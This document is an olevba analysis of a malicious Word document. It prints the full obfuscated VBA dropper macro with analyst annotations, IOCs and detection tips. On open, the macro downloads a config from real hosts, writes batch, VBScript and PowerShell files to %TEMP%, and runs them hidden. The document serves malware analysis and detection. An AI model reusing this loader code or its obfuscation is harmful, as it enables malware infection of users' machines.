olevba 0.25 - http://decalage.info/python/oletools
Flags Filename
----------- -----------------------------------------------------------------
OLE:MAS-HB- origin~1.doc
(Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
Note that the I (IOC) flag is not set even though the macro below contacts three hosts: every URL and dropped-file name is assembled from string fragments at run time (see the split host strings in Kjidjandjkhqwhd), so olevba's IOC patterns never see a whole URL in the static source.
===============================================================================
FILE: origin~1.doc
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisDocument.cls
in file: origin~1.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Empty. The "_Open" suffix makes this look like an object event handler, but
' no object named Jiqjdojksasndjkbqw exists anywhere in the listing; padding.
Sub Jiqjdojksasndjkbqw_Open()
End Sub
' Empty decoy handler, same pattern as Jiqjdojksasndjkbqw_Open above.
Sub Xqkjdlkasjdklwlqds_Open()
End Sub
' Hub that both auto-exec names forward to: AutoOpen (the name Word honours in
' a .doc) and Workbook_Open (the Excel name) each call this. Ewjklasjdklasska
' is a no-op; Kjidjandjkhqwhd is the actual dropper.
Sub Auto_Open()
Ewjklasjdklasska
Kjidjandjkhqwhd
End Sub
' No-op called first from Auto_Open. Its only statement stores a junk literal
' in a procedure-local variable that nothing reads; it exists to pad the
' module and dilute keyword-based scoring.
Sub Ewjklasjdklasska()
    Dim padding As String
    padding = "qhwkjekj2 k1hkeh12eh1 sa"
End Sub
' Never called from anything in this listing. Same junk-assignment padding
' pattern as Ewjklasjdklasska.
Sub Xjdklqjds()
    Dim padding As String
    padding = "21kjek 21hjeh12ke"
End Sub
' Word's document-open auto-exec name (olevba: "Runs when the Word document is
' opened"). This is the trigger that matters for origin~1.doc; it simply
' forwards to Auto_Open, which runs the dropper.
Sub AutoOpen()
Auto_Open
End Sub
' Excel-flavoured auto-exec name. Word does not raise it, so in this .doc the
' sub is dead unless the VBA project is carried over into a workbook; it
' suggests the same loader source is reused across Office formats. The
' assignment is junk; the call forwards to Auto_Open.
Sub Workbook_Open()
NJQKDBJQ = "kj2eh jk12hjek 12hjke "
Auto_Open
End Sub
' Dropper stage. Everything below is string-assembly obfuscation around a
' short flow: fetch a base64 config from one of two WordPress-style paths,
' cut <tagN>...</tagN> sections out of it, write a .bat/.vbs/.ps1 set into
' %TEMP%, run the .bat hidden, then scrub marker tags from the document body.
' Constant-folded values are noted inline; they were worked out by hand from
' the visible expressions and should be confirmed in a sandbox before being
' used as IOCs.
'
' Observable artifacts, as written:
'   files    %TEMP%\<5-digit>.bat, .vbs, .ps1 (stem from Ubqhwdhwqbd)
'   network  http://midwestlabradoodle.com/wp-content/plugins/really-simple-captcha/6727156315273.txt
'            http://artyouneed.com/wp-includes/theme-compat/6727156315273.txt (fallback)
'            .../kaka.txt on whichever of the two hosts answered
'            http://savepic.su/5751812.jpg and /5757956.jpg (handed to the scripts as statRT / $stat)
'   process  WINWORD.EXE -> Shell(<stem>.bat, window style 0 = hidden)
' The bat/vbs/ps1 bodies come from the downloaded config (TVT*/XPT*), so what
' they actually execute is not visible in this listing.
Sub Kjidjandjkhqwhd()
Dim asjiw As Integer, woweffect As Integer, jwasssssdas As Integer, asdsssssjqwdq As Integer
Dim retVal As Variant, huwe As Integer, auwd As Integer, aabbb As Integer, BLAHUWDHS As String, YYDBHWD As String
YYDBHWD = Chr(90 + 2) ' Chr(92) = "\"
YUGQYD = Ubqhwdhwqbd(23269) + "" ' 5-digit pseudo-random stem; no Randomize anywhere in the listing
BLAHUWDHS = Chr(84) & "em" + "p" ' "Temp"
QHDQUWH = YUGQYD
FL2 = QHDQUWH ' FL2 = file stem shared by all three dropped scripts
PH2 = Module2.Goabc(BLAHUWDHS) + YYDBHWD ' PH2 = %TEMP% & "\"
woweffect = 6
jwnqdw = 1 - woweffect ' -5
JIQWDJQ = 12312312
JIQWDJQ = 1 + 1 + 113 + Sgn(jwnqdw) ' 115 - 1 = 114
AAAA = JIQWDJQ
HYWDAX = "baji dahjkhdiqdq uhst" ' junk
JWIDJIAAA = ""
HUYFEA = "jh qjksh jkhjk hjkh djkasd"
QIWJDABB = "b"
HUYFEA = QIWJDABB + "a" + "t" ' "bat"
IUQJWD = "ajhdqu iydhiuh2hjg h" ' junk
PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49) ' <stem>.ps1
huwe = NUqwdqwbdsad(1 - 300 * Sin(20)) ' Sin(20 rad) ~ 0.91, argument ~ -273 -> Sgn = -1
SSS = Chr(AAAA + 2 + huwe) ' Chr(115) = "s"
VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & "" ' <stem>.vbs
BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + huwe + 2) + HUYFEA ' -1+31-10+25-1+2 = 46 = "." -> <stem>.bat
INTG = "" & "o" & "bject" ' "object"
KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "d" + "" + "ul" + "e" ' Chr(111) = "o" -> "odule"
AFTG = "m" & KIWD ' "module"
SXEE = Chr(46) ' "."
SXAA = Chr(101) ' "e"
SXE = SXEE & SXAA & "" & "xe" ' ".exe"
GNG = "" & ".jpg" & ""
HUQD = Chr(30 + 16 + 1) ' Chr(47) = "/"
ATTH = "ht" & "t" & "" & "p" & ":" & "/" & "/" ' "http://"
SPIC = Chr(100 + 15) + "av" & "epi" + "c." & "s" & "u" + HUQD ' "savepic.su/"
PSPTH = PH2 + PSFL ' %TEMP%\<stem>.ps1
VBPTH = PH2 + VBFL ' %TEMP%\<stem>.vbs
BAPTH = "hkjackjh kjh bhjsb"
ABPTH = PH2 + BAFL
BAPTH = ABPTH ' %TEMP%\<stem>.bat
Dim AAAAHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
' VBA file numbers for the Open ... For Output / Print # calls below
DRT = 315
BFT = 316
CFT = 317
DFT = 318
EFT = 319
Dim NUWDHUQHUQWDH As String
NUWDHUQHUQWDH = "USE" & "RPROFILE" ' "USERPROFILE"
Dim PBIn As String, asdwq As String, MIWDWQ As String
TSTS = "." + "t" + "xt"
CDDD = "6727156315273" + TSTS ' "6727156315273.txt" - the base64 config file
LNSS = "kaka" + TSTS ' "kaka.txt"
STT1 = "midwestlabradoodle.com/w" + "p-content/pl" + "ugins/really-simple-captcha/" ' primary host/path
STT2 = "artyouneed.com/w" + "p-includes/t" + "heme-compat/" ' fallback host/path
PBIn = ATTH + STT1 + CDDD
CONT = Module2.Jhuqwhdhsss(PBIn) ' synchronous GET; a transport error raises straight out of here
asdwq = Rasdas(CONT) ' last character of the response body
HQUWDAAA = "0"
' Liveness check: a base64 blob is expected to end in "=" padding. If the
' primary host did not return one, retry the fallback and keep its whole body.
If (asdwq <> "=") Then
PBIn = ATTH + STT2 + CDDD
CONT = Module2.Jhuqwhdhsss(PBIn)
asdwq = CONT
HQUWDAAA = "1" ' remembers which host answered; reused for kaka.txt below
End If
' NOTE(review): when the primary host succeeds, asdwq still holds only the
' single trailing "=" assigned above, so this decodes one character rather
' than the response. Only the fallback branch decodes the full body. Looks
' like an author bug; confirm in a sandbox before relying on either path.
CONT = Quqhwdbyas(asdwq) ' base64 -> text (see Quqhwdbyas for the byte-array caveat)
Dim ahuywdgqy As String
' Script fragments are carved out of the decoded config by <tag>...</tag>.
' From how they are written out below: text10 = ps1 body, text20/text21 =
' bat body and text30/text31 = vbs body on the \Users\ branch; stext1/stext2
' = bat body and stext3 = vbs body on the XP-style branch.
TVT10 = Port(CONT, "t" + "ext10")
TVT20 = Port(CONT, "text20")
TVT21 = Port(CONT, "text21")
TVT30 = Port(CONT, "text30")
TVT31 = Port(CONT, "text31")
XPT1 = Port(CONT, "stext1")
XPT2 = Port(CONT, "stext2")
XPT3 = Port(CONT, "stext3")
WVR = Module2.Goabc(NUWDHUQHUQWDH) ' %USERPROFILE%
hufehu1 = InStr(WVR, "sers\") ' non-zero when the profile lives under \Users\ (Vista and later layout)
Dim hudhw As Integer
Dim ghdAdd(1 To 3)
ghdAdd(1) = "1"
ghdAdd(2) = "0"
ghdAdd(3) = "0"
If (hufehu1 <> 0) Then
ghdAdd(1) = "2" ' "2 0 0"
Else
ghdAdd(2) = "3" ' "1 3 0"
End If
JHWQUD = Join(ghdAdd) ' space-separated; Val() strips the blanks
hudhw = Val(JHWQUD) ' 200 = \Users\ profile, 130 = anything else (XP-style "Documents and Settings")
Module2.WaitFor (1)
MIWDWQ = ATTH + STT1 + LNSS
If (HQUWDAAA = "1") Then
MIWDWQ = ATTH + STT2 + LNSS
End If
SEXX = Module2.Jhuqwhdhsss(MIWDWQ) ' kaka.txt body, passed verbatim to the scripts as strRT / $ggtt (presumably a payload URL - not visible here)
PSTB = PBIn + "123123123" ' unused
MSTAR1 = SPIC + "5751812" + GNG ' savepic.su/5751812.jpg
MSTAR2 = SPIC + "5757956" + GNG ' savepic.su/5757956.jpg
STAR1 = ATTH + MSTAR1
STAR2 = ATTH + MSTAR2 ' unused; MSTAR2 is embedded into the ps1 separately
FFQ = "8"
FF = FFQ + SXE ' "8.exe" - the name the scripts are told to use in %TEMP%
' --- XP-style profile (hudhw = 130): write .bat + .vbs, run the .bat hidden ---
If (hudhw = 130) Then
Open BAPTH For Output As #DRT
Print #DRT, XPT1
Print #DRT, ":rtqdftqwfdhwgqf" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34) ' trfd="%TEMP%\"
Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34) ' nmsj="<stem>"
Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34) ' exds="8"
Print #DRT, XPT2
Close #DRT
Module2.WaitFor (1)
Open VBPTH For Output As #BFT
Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & "" ' jfeuygq = "8.exe"
Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq" ' "%TEMP%\"+jfeuygq
Print #BFT, XPT3
Close #BFT
' NOTE(review): BDDT is not one of the three VBA modules olevba found
' (ThisDocument, Module1, Module2) and is not declared anywhere visible, so
' without Option Explicit it is an empty Variant and this line should raise
' "Object required" (424) - the Shell right after it would then never run on
' this branch. Every other wait in the file goes through Module2.WaitFor.
BDDT.WaitFor (1)
NTH1 = Module1.GHJgwqdjqgw(retVal, BAPTH) ' Shell("%TEMP%\<stem>.bat", 0)
End If
HUDQG = "';"
' --- \Users\ profile (hudhw = 200): write .ps1 + .vbs + .bat, run the .bat hidden ---
If (hudhw = 200) Then
ZPQSKD = FL2
Open PSPTH For Output As #CFT
Print #CFT, "$ujdkwq = 'jqwdb';"
Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';" ' http://savepic.su/5757956.jpg
Print #CFT, "$ggtt = '" + SEXX + "';" ' kaka.txt body
Print #CFT, "$pths = '" + PH2 + HUDQG ' '%TEMP%\';
Print #CFT, "$wehs = '" + ZPQSKD + HUDQG ' '<stem>';
Print #CFT, "$nnm = '" + FFQ + "';" ' '8';
Print #CFT, TVT10
Close #CFT
Open VBPTH For Output As #DFT
Print #DFT, TVT30
Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih" ' currentFile = "%TEMP%\"&"<stem>"&huih (huih must come from TVT30)
Print #DFT, TVT31
Close #DFT
Open BAPTH For Output As #EFT
Print #EFT, "@" + "ec" + "ho off"
Print #EFT, ":hqwdjkhqw"
Print #EFT, TVT20
Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34) ' Ads3="<stem>"
Print #EFT, ":nqjwkdkqwd"
Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34) ' Mts4="%TEMP%\"
Print #EFT, ":qbjdhwqbdwqh"
Print #EFT, "set Rts4=" + "%Mts4%%Ads3%" ' %TEMP%\<stem>
Print #EFT, TVT21
Close #EFT
Module2.WaitFor (1)
NTH2 = Module1.GHJgwqdjqgw(retVal, BAPTH) ' Shell("%TEMP%\<stem>.bat", 0)
End If
' Tidy-up of the visible document: delete everything between <object> and
' </object>, recolor the <module>...</module> span black, then try to erase
' the four tags. Presumably the lure text sits in <module> and something the
' author did not want seen sits in <object>, but the document body itself is
' not in this listing, so treat that as a guess.
JUW = Chr(47) ' "/"
AKK = Chr(60) ' "<"
ZKK = ">"
NTH3 = Module1.Thwqbdhjabs(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1) ' delete <object>..</object>
NTH4 = Module1.Thwqbdhjabs(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2) ' recolor <module>..</module>
NTH5 = Module1.Thwqbdhjabs(AKK + INTG + ZKK, "", 3) ' mode 3 is meant to blank the tag, but Thwqbdhjabs
NTH6 = Module1.Thwqbdhjabs(AKK + JUW + INTG + ZKK, "", 3) ' sets .Text = a there, a name it never declares,
NTH7 = Module1.Thwqbdhjabs(AKK + AFTG + ZKK, "", 3) ' so these four calls likely leave the tags in place
NTH8 = Module1.Thwqbdhjabs(AKK + JUW + AFTG + ZKK, "", 3)
End Sub
' Sign of an Integer: -1, 0 or 1. Kjidjandjkhqwhd leans on it to turn
' constant-folded arithmetic into single characters via Chr(); it is a
' renamed Sgn and nothing more.
Public Function NUqwdqwbdsad(a As Integer)
    Select Case a
        Case Is < 0
            NUqwdqwbdsad = -1
        Case 0
            NUqwdqwbdsad = 0
        Case Else
            NUqwdqwbdsad = 1
    End Select
End Function
' Pseudo-random decimal string in [10000, a + 9999], used by Kjidjandjkhqwhd
' as the file stem of the dropped .bat/.vbs/.ps1 (a = 23269, so always five
' digits). No Randomize call appears in any of the three modules, so Rnd
' starts from VBA's fixed seed and the first stem of a session is
' reproducible - handy for building a host-side IOC.
Public Function Ubqhwdhwqbd(a As Integer)
    Dim scaled As Single
    scaled = Rnd * a + 10000
    Ubqhwdhwqbd = CStr(Int(scaled))
End Function
' Base64 decoder using the classic MSXML DOM trick: an element with
' DataType "bin.base64" exposes the decoded bytes through nodeTypedValue.
' The ProgID is assembled as Chr(78 + asduiwhqdqiw) & "SXML2.DOMDocument";
' Log10(100) = 2 and Sgn(1 - 2) = -1, so that is Chr(77) = "M" and the object
' created is "MSXML2.DOMDocument". Useful detection point: winword.exe
' instantiating MSXML2.DOMDocument right after an outbound HTTP request.
'
' NOTE(review): nodeTypedValue is a Byte array. It lands in the undeclared
' Variant WUDHA and is then coerced to the String return with no StrConv, so
' the decoded bytes are read as UTF-16LE code units. That only yields the
' readable <tag> markup Port() looks for if the server encoded UTF-16 text in
' the first place - cannot tell from here; check the decoded config in a
' sandbox.
Public Function Quqhwdbyas(ByVal strData As String) As String
Dim objXML As Object
Dim objNode As Object
Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
nudqwd = Log10(100) ' 2 (Integer assignment rounds)
asduiwhqdqiw = NUqwdqwbdsad(1 - nudqwd) ' -1
QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument" ' "MSXML2.DOMDocument"
Set objXML = CreateObject("" & QHDHUQW)
Set objNode = objXML.createElement("b6" + "4")
objNode.DataType = "bin.b" + Chr(97) + "se6" + "4" ' "bin.base64"
objNode.Text = strData
WUDHA = objNode.nodeTypedValue ' Byte array
Quqhwdbyas = WUDHA ' raw byte copy into a String (see note above)
Set objNode = Nothing
Set objXML = Nothing
End Function
' Return the text between <b> and </b> in a, or the text from offset 8 up to
' the closing tag when the opening tag is absent (InStr returns 0 and the
' hard-coded + 8 is still applied). The + 8 is the length of "<" & b & ">"
' only for the 6-character names the caller uses ("text10", "stext1", ...);
' any other tag length yields a mis-aligned slice. A missing closing tag
' makes the length negative and Mid$ raises.
Public Function Port(a, b As String)
    Dim openTag As String, closeTag As String
    Dim startPos As Long
    Dim sliceLen As Integer
    openTag = "<" & b & ">"
    closeTag = "</" & b & ">"
    startPos = InStr(1, a, openTag) + 8
    sliceLen = InStr(1, a, closeTag) - startPos
    Port = Mid$(a, startPos, sliceLen)
End Function
' Last character of a, or "" for an empty string. Kjidjandjkhqwhd uses it to
' check whether the fetched config ends in base64 "=" padding.
Private Static Function Rasdas(a As String)
    If Len(a) = 0 Then
        Rasdas = ""
    Else
        Rasdas = Mid$(a, Len(a), 1)
    End If
End Function
' Base-10 logarithm via the natural log ratio. Only caller is Quqhwdbyas,
' which feeds it 100 to obtain the 2 that selects "M" for the MSXML ProgID.
' The original also assigned a junk string literal; dropped here.
Private Static Function Log10(x)
    Dim natural As Double
    natural = Log(x)
    Log10 = natural / Log(10#)
End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+----------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+----------------+-----------------------------------------+
| AutoExec | AutoOpen | Runs when the Word document is opened |
| AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
| AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
| Suspicious | CreateObject | May create an OLE object |
| Suspicious | Open | May open a file |
| Suspicious | Output | May write to a file (if combined with |
| | | Open) |
| Suspicious | Print # | May write to a file (if combined with |
| | | Open) |
| Suspicious | Chr | May attempt to obfuscate specific |
| | | strings |
| Suspicious | Hex Strings | Hex-encoded strings were detected, may |
| | | be used to obfuscate strings (option |
| | | --decode to see all) |
| Suspicious | Base64 Strings | Base64-encoded strings were detected, |
| | | may be used to obfuscate strings |
| | | (option --decode to see all) |
+------------+----------------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: origin~1.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Execution primitive: launch b as a hidden process (window style vbHide = 0)
' and return the task ID, which is also written back through the ByRef a.
' Kjidjandjkhqwhd calls this with the dropped %TEMP%\<stem>.bat, so the
' observable chain is WINWORD.EXE spawning cmd.exe with no window. The
' original also assigned a junk string literal; dropped here.
Public Function GHJgwqdjqgw(a As Variant, b)
    Dim taskId As Double
    taskId = Shell(b, vbHide)
    a = taskId
    GHJgwqdjqgw = taskId
End Function
' Post-drop tidy-up of the visible document body. dnuwhd is an opening
' marker tag, b the matching closing tag (or "" in mode 3), c the mode:
'   1 - delete the text between the two tags
'   2 - recolor the text between the two tags black
'   3 - find-and-replace a tag with a single space across the document
' Modes 1 and 2 first locate dnuwhd, collapse to its end, locate b from
' there, collapse to its start, and operate on the Range spanning the gap.
' The function never assigns its return value. The repeated
' QGDQWJGDHJQWGDQWD assignments (live and commented out) are dead padding.
Public Function Thwqbdhjabs(dnuwhd As String, b As String, c As Integer)
Dim selectedText As String
Dim wwkjdasjdljslqlkjdklqjwdlkas As Range, lesleslesqjhdjqkwhdwq As Range
Set wwkjdasjdljslqlkjdklqjwdlkas = ActiveDocument.Range
QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
With wwkjdasjdljslqlkjdklqjwdlkas.Find
'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
.Text = dnuwhd
.MatchWholeWord = True
wwkjdasjdljslqlkjdklqjwdlkas.Find.Execute ' range now covers the opening tag
wwkjdasjdljslqlkjdklqjwdlkas.Collapse direction:=wdCollapseEnd
Dim wdwq As String
Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
Dim wdsadwq As String
lesleslesqjhdjqkwhdwq.Start = wwkjdasjdljslqlkjdklqjwdlkas.End ' gap starts right after the opening tag
.Text = b
.MatchWholeWord = True
.Execute ' search continues from the collapsed position; range now covers the closing tag
QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
wwkjdasjdljslqlkjdklqjwdlkas.Collapse direction:=wdCollapseStart
lesleslesqjhdjqkwhdwq.End = wwkjdasjdljslqlkjdklqjwdlkas.Start ' gap ends right before the closing tag
If (c = 1) Then
selectedText = lesleslesqjhdjqkwhdwq.Delete ' Range.Delete returns a count; stored and ignored
End If
If (c = 2) Then
lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
End If
Dim hduwaa As Integer
hduwaa = 1 - 423 ' unused
If (c = 3) Then
With wwkjdasjdljslqlkjdklqjwdlkas.Find
' NOTE(review): `a` is not a parameter or local of this function (the
' parameters are dnuwhd, b, c) and Module1 declares no module-level
' variables, so without Option Explicit it is an empty Variant and the search
' text becomes "" instead of the tag passed in dnuwhd. As written, the mode-3
' calls from Kjidjandjkhqwhd appear not to strip the tags - verify in Word,
' since the behaviour of ReplaceAll on an empty Find.Text is not something
' this listing establishes.
.Text = a
.Replacement.Text = "" & " "
'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
'QGDQWJGDHJQWGDQWD = "qwdghjg2jh1gd h1dj21gdhj21g1h2dqwdqw"
.Wrap = wdFindContinue
.Execute Replace:=wdReplaceAll
End With
End If
End With
End Function
' Thin wrapper over Mid(a, b, c): c characters of a starting at 1-based
' offset b. Nothing in this listing calls it; the original body was ten
' identical junk assignments around the single Mid call, dropped here.
Public Function Moloko(a, b, c)
    Dim slice
    slice = Mid(a, b, c)
    Moloko = slice
End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+---------+-----------------------------------------+
| Type | Keyword | Description |
+------------+---------+-----------------------------------------+
| Suspicious | Shell | May run an executable file or a system |
| | | command |
+------------+---------+-----------------------------------------+
-------------------------------------------------------------------------------
VBA MACRO Module2.bas
in file: origin~1.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
' Environment lookup, renamed. Kjidjandjkhqwhd uses it for "Temp" (drop
' directory) and "USERPROFILE" (to tell a \Users\ layout from an XP-style
' profile). Returns "" when the variable is unset, as Environ does.
Public Function Goabc(sps As String)
    Dim value As String
    value = Environ$(sps)
    Goabc = value
End Function
' Busy-wait for roughly NumOfSeconds, pumping messages with DoEvents so Word
' stays responsive. Used between writing the dropped scripts and launching
' them, and before the second download. Timer is seconds since midnight, so
' the deadline is rounded to a whole second (Long) and a wait that straddles
' midnight keeps spinning until the clock catches up again.
Sub WaitFor(NumOfSeconds As Long)
    Dim deadline As Long
    deadline = Timer + NumOfSeconds
    While Timer < deadline
        DoEvents
    Wend
End Sub
' Plain synchronous HTTP GET of url a; returns the response body as text.
' The ProgID is assembled as "MSXML2.ServerXMLHTTP" (Chr(84) Chr(84) Chr(80)
' = "TTP"); per the MSXML documentation that is the WinHTTP-based client, so
' the user's IE/WinINET proxy settings are not consulted - worth knowing when
' a proxy log shows nothing. No request headers are set, the status code is
' never checked, and there is no error handling: a transport failure raises
' into the caller, and an error page is returned as if it were content.
' Called three times from Kjidjandjkhqwhd (config, fallback config,
' kaka.txt). The HUQHIDHHSG assignments are dead padding.
Public Function Jhuqwhdhsss(a As String)
Dim ygwdg As Integer, Sduhqiuwhdagshdjqgwqwg As Object
Dim ggFw As String
ggFw = a
HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
BQDHJQWDGWQJGS = "MSXML2." & "Ser" & "ver" & "X" & "MLH" & Chr(84) & Chr(84) & Chr(80) ' "MSXML2.ServerXMLHTTP"
Set Sduhqiuwhdagshdjqgwqwg = CreateObject(BQDHJQWDGWQJGS)
Sduhqiuwhdagshdjqgwqwg.Open "G" & "" & "ET", ggFw ' no async flag, so the call blocks
HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
Sduhqiuwhdagshdjqgwqwg.Send ("")
HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
HUQHIDHHSG = "jn2ehj2 eg2h1gehj12gej1g2eu2gig 2"
Jhuqwhdhsss = Sduhqiuwhdagshdjqgwqwg.responsetext ' body returned regardless of HTTP status
End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
ANALYSIS:
+------------+--------------+-----------------------------------------+
| Type | Keyword | Description |
+------------+--------------+-----------------------------------------+
| Suspicious | CreateObject | May create an OLE object |
| Suspicious | Open | May open a file |
| Suspicious | Environ | May read system environment variables |
| Suspicious | Chr | May attempt to obfuscate specific |
| | | strings |
+------------+--------------+-----------------------------------------+